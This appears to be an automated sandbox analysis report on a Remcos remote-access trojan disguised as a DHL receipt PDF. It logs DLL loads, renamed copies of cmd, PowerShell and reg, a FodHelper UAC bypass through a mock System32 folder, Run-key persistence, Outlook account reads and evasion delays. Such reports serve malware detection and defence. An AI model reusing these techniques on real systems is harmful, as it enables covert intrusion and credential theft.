              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeSection loaded: am.dllJump to behavior
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ???.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ??l.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ?.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ??l.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ????.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ???e???????????.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ??l.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: am.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: amsi.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: urlmon.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: srvcli.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: rstrtmgr.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: ntmarta.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: edputil.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: windows.staterepositoryps.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: wintypes.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: appresolver.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: bcp47langs.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: slc.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: sppc.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: onecorecommonproxystub.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Section loaded: onecoreuapcommonproxystub.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: apphelp.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: winmm.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: kernel.appcore.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: uxtheme.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: windows.storage.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: wldp.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: propsys.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: profapi.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: edputil.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: urlmon.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: iertutil.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: srvcli.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: netutils.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: windows.staterepositoryps.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: sspicli.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: wintypes.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: appresolver.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: bcp47langs.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: slc.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: userenv.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: sppc.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: onecorecommonproxystub.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: onecoreuapcommonproxystub.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: pcacli.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: mpr.dll
               Source: C:\Users\Public\Libraries\yfkwifxL.pif Section loaded: sfc_os.dll
               Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: cabinet.dll
               Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: uxtheme.dll
               Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: kernel.appcore.dll
               Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: textinputframework.dll
               Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coreuicomponents.dll
               Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: coremessaging.dll
               Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: ntmarta.dll
               Source: C:\Windows\SysWOW64\extrac32.exe Section loaded: wintypes.dll
               Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: apphelp.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: version.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: uxtheme.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: archiveint.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: cryptsp.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: url.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: ieframe.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: iertutil.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: netapi32.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: userenv.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: winhttp.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: wkscli.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: netutils.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: windows.storage.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: wldp.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: kernel.appcore.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: propsys.dll
               Source: C:\ProgramData\Remcos\remcos.exe Section loaded: amsi.dll
               Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F5FB2C77-0E2F-4A16-A381-3E560C68BC83}\InProcServer32
               Source: Window Recorder Window detected: More than 3 window changes detected
               Source: C:\Users\Public\xkn.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
               Source: C:\ProgramData\Remcos\remcos.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
               Source: DHL119040 receipt document,pdf.exe Static file information: File size 1390592 > 1048576
              Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: easinvoker.pdb source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: FodHelper.pdb source: extrac32.exe, 0000000E.00000002.1763595551.000001B076CE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000018.00000000.1833101121.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe, 00000018.00000002.1840596880.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe.14.dr
               Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000007.00000002.1735401572.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000007.00000000.1734234471.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000002.1741873077.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000000.1735973999.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000000.1743797680.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000002.1750531723.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000000.1750914185.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000002.1758990941.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000002.1764352289.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000000.1759822129.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000000.1764756849.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000002.1832421872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000000.1794890355.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000002.1798993519.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000002.1849408594.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000000.1843787747.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000000.1850048548.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000002.1861809511.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000000.1862257217.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000002.1863811954.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000002.1865641377.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000000.1864540039.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000002.1867019902.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000000.1866079872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000002.1868535173.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000000.1867521283.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000000.1870059327.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000002.1871322746.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000002.1872553278.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000000.1871755612.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe,
              Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000010.00000000.1765237716.00007FF7F65BA000.00000002.00000001.01000000.0000000A.sdmp, xkn.exe.12.dr
              Source: Binary string: easinvoker.pdbH source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: reg.pdb source: extrac32.exe, 0000000A.00000002.1749786988.000001CBEB360000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000000.1795528997.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe, 00000013.00000002.1796884193.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe.10.dr
              Source: Binary string: powershell.pdb source: xkn.exe, 00000010.00000000.1765237716.00007FF7F65BA000.00000002.00000001.01000000.0000000A.sdmp, xkn.exe.12.dr
               Source: Binary string: cmd.pdb source: alpha.exe, 00000007.00000002.1735401572.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000007.00000000.1734234471.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000002.1741873077.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000008.00000000.1735973999.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000000.1743797680.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000009.00000002.1750531723.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000000.1750914185.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000B.00000002.1758990941.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000002.1764352289.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000D.00000000.1759822129.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000000.1764756849.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000000F.00000002.1832421872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000000.1794890355.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000012.00000002.1798993519.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000002.1849408594.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 0000001C.00000000.1843787747.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000000.1850048548.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000020.00000002.1861809511.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000000.1862257217.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000022.00000002.1863811954.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000002.1865641377.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000023.00000000.1864540039.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000002.1867019902.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000024.00000000.1866079872.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000002.1868535173.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000025.00000000.1867521283.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000000.1870059327.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000026.00000002.1871322746.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000002.1872553278.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 00000027.00000000.1871755612.00007FF7689E2000.00000002.00000001.01000000.00000009.sdmp, alpha.exe, 000
              Source: Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000E.00000002.1763595551.000001B076CE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000018.00000000.1833101121.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe, 00000018.00000002.1840596880.00007FF626C9B000.00000002.00000001.01000000.0000000E.sdmp, per.exe.14.dr
              Source: Binary string: reg.pdbGCTL source: extrac32.exe, 0000000A.00000002.1749786988.000001CBEB360000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000013.00000000.1795528997.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe, 00000013.00000002.1796884193.00007FF6DF320000.00000002.00000001.01000000.0000000D.sdmp, ger.exe.10.dr

              Data Obfuscation

              Source: C:\Users\Public\Libraries\yfkwifxL.pif Unpacked PE file: 1.2.yfkwifxL.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs . :EW;. :EW;. :R;. :W;. :W;. :W;
              Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.28a0000.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.DHL119040 receipt document,pdf.exe.28a0000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000000.00000002.1735332955.00000000028A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: yfkwifxL.pif.0.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7CC8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 0_2_028B7CC8
              Source: alpha.exe.6.dr Static PE information: section name: .didat
              Source: per.exe.14.dr Static PE information: section name: .imrsiv
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BD2E4 push ecx; mov dword ptr [esp], edx 0_2_028BD2E9
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CA2FC push 028CA367h; ret 0_2_028CA35F
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A32FC push eax; ret 0_2_028A3338
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A635A push 028A63B7h; ret 0_2_028A63AF
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A635C push 028A63B7h; ret 0_2_028A63AF
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CA0AC push 028CA125h; ret 0_2_028CA11D
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B3003 push 028B3051h; ret 0_2_028B3049
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B3004 push 028B3051h; ret 0_2_028B3049
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CB1A4 pushad ; retf 0_2_028CB1A5
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CA1F8 push 028CA288h; ret 0_2_028CA280
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CA144 push 028CA1ECh; ret 0_2_028CA1E4
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A674E push 028A6792h; ret 0_2_028A678A
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028A6750 push 028A6792h; ret 0_2_028A678A
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028AC504 push ecx; mov dword ptr [esp], edx 0_2_028AC509
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028AD538 push 028AD564h; ret 0_2_028AD55C
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028ACB84 push 028ACD0Ah; ret 0_2_028ACD02
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B78A4 push 028B7921h; ret 0_2_028B7919
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028AC8B2 push 028ACD0Ah; ret 0_2_028ACD02
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B68DE push 028B698Bh; ret 0_2_028B6983
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B68E0 push 028B698Bh; ret 0_2_028B6983
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028C9874 push 028C9A60h; ret 0_2_028C9A58
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028CDE98 push eax; ret 0_2_028CDF68
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B9EBB push 028B9EF4h; ret 0_2_028B9EEC
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B9EBC push 028B9EF4h; ret 0_2_028B9EEC
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B2EF8 push 028B2F6Eh; ret 0_2_028B2F66
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B5E14 push ecx; mov dword ptr [esp], edx 0_2_028B5E16
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7F18 push 028B7F50h; ret 0_2_028B7F48
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B7C7C push 028B7CBEh; ret 0_2_028B7CB6
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA74E56 push ecx; ret 0_2_2DA74E69
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA97A28 push eax; ret 0_2_2DA97A46
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA9B132 push esp; ret 0_2_2DA9B141

              Persistence and Installation Behavior

              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe File created: C:\Users\Public\Libraries\yfkwifxL.pif
              Source: C:\Windows\System32\cmd.exe Executable created and started: C:\Windows \System32\per.exe
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA46EB0 ShellExecuteW,URLDownloadToFileW, 0_2_2DA46EB0
              Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe File created: C:\ProgramData\Remcos\remcos.exe
              Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\xkn.exe
              Source: C:\Windows\System32\extrac32.exe File created: C:\Windows \System32\per.exe
              Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\ger.exe

              Boot Survival

              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-0X3XK5
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Lxfiwkfy
              Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
              Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\xkn.exe
              Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\ger.exe
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA5AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 0_2_2DA5AB0D
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Rmc-0X3XK5
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028B9EF8 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_028B9EF8
              Source: C:\ProgramData\Remcos\remcos.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\ProgramData\Remcos\remcos.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\yfkwifxL.pif Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\ProgramData\Remcos\remcos.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\xkn.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_028BCD74 0_2_028BCD74
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Code function: 0_2_2DA4F7A7 Sleep,ExitProcess, 0_2_2DA4F7A7
              Source: C:\ProgramData\Remcos\remcos.exe Code function: 5_2_2D5AF7A7 Sleep,ExitProcess, 5_2_2D5AF7A7
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess graph_0-84394
              Source: c:\users\public\xkn.exe Key value queried: Powershell behavior
              Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
              Source: C:\Users\Public\xkn.exe Memory allocated: 151BB7A0000 memory reserve | memory write watch
